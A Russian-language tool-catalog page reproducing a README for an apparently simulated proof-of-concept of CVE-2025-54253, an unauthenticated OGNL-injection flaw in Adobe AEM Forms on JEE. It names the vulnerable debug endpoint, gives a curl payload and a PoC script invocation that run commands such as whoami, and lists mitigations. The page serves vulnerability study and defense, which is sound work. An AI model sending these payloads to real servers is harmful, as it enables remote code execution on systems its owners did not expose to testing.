Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-54253-Exploit-Demo — Симулированный PoC для CVE-2025-54253: уязвимость внедрения OGNL в Adobe AEM | Kitploit
Инструменты/GitHubGitHub/shivshantp/cve-2025-54253-exploit-demo
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubshivshantp/cve-2025-54253-exploit-demo

CVE-2025-54253-Exploit-Demo

Симулированный PoC для CVE-2025-54253: уязвимость внедрения OGNL в Adobe AEM

Репозиторий
1111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE Exploit-Status Python License PoC

🚨 CVE-2025-54253 – Adobe AEM Forms на JEE: внедрение OGNL, приводящее к RCE

🔎 Обзор

CVE-2025-54253 — это критическая уязвимость внедрения OGNL в Adobe AEM Forms на JEE. Она позволяет неавторизованным злоумышленникам выполнять произвольные команды операционной системы через конечную точку /adminui/debug?debug=OGNL:.

  • Серьезность: Критическая
  • Оценка CVSS: 9.8 (ожидается)
  • Вектор атаки: Удаленный
  • Требуется аутентификация: Нет
  • Затронутый продукт: Adobe AEM Forms на JEE (<= 6.5.23.0)
  • Статус: Подтвержденная эксплуатация

🧠 Технические детали

Эта уязвимость находится в открытом интерфейсе отладки, который выполняет контролируемые пользователем выражения OGNL без должной очистки или аутентификации. Ее эксплуатация может привести к удаленному выполнению кода в контексте сервера приложений.

📝 Примечание: Эта уязвимость затрагивает установки, которые открывают конечную точку /adminui/debug публично или внутри сети без надлежащего контроля доступа.


🧪 Доказательство концепции (PoC)

🔸 Вектор HTTP-полезной нагрузки

Простые выражения OGNL демонстрируют выполнение команд через браузер или curl.

root@kitploit:~
curl "http://localhost:4502/adminui/debug?debug=OGNL:whoami"

📄 Скрипт PoC

cve-2025-54253-poc.py

root@kitploit:~
python3 poc/cve-2025-54253-poc.py --url http://127.0.0.1:4502 --cmd "whoami"

🧾 Пример журнала эксплуатации

Скрипт записывает вывод выполнения команд в exploit.log:

exploit.log


🛠️ Шаги для воспроизведения

  1. Настройте уязвимый экземпляр Adobe AEM (<= 6.5.23.0).

  2. Запустите сервер Flask (при локальном моделировании):
    Flask Running

  3. Выполните OGNL в браузере:
    Browser Execution

  4. Выполните через curl:
    Curl Execution

  5. Вывод команд:
    id
    uname -a
    ls -la

  6. Вид журнала Flask:
    Flask Logs

  7. Запуск скрипта PoC:
    Script Execution

  8. Подробный вид журнала:
    Log Output


🧰 Используемые инструменты и технологии

  • Python (написание PoC)
  • Flask (симулируемый сервер)
  • Kali Linux
  • curl и браузер
  • GitHub (публикация PoC)

✅ Меры по устранению

  • Ограничьте доступ к /adminui/debug
  • Примените патчи от вендора по мере поступления
  • Отслеживайте несанкционированные выражения OGNL в журналах доступа
  • Используйте WAF или прокси-фильтрацию для блокировки таких паттернов

⚠️ Отказ от ответственности: Данный PoC предназначен только для образовательных целей. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


👨‍💻 Автор

Shivshant Patil
Сертифицированный этичный хакер (CEH v13)
Выпускник по специальности «Компьютерная инженерия» (бакалавр)
🔗 LinkedIn
🔗 GitHub


📚 Ссылки

  • 🔗 Рекомендации Adobe по безопасности
  • 🔗 Запись NVD - CVE-2025-54253
  • 🔗 Exploit Database
Скачать инструмент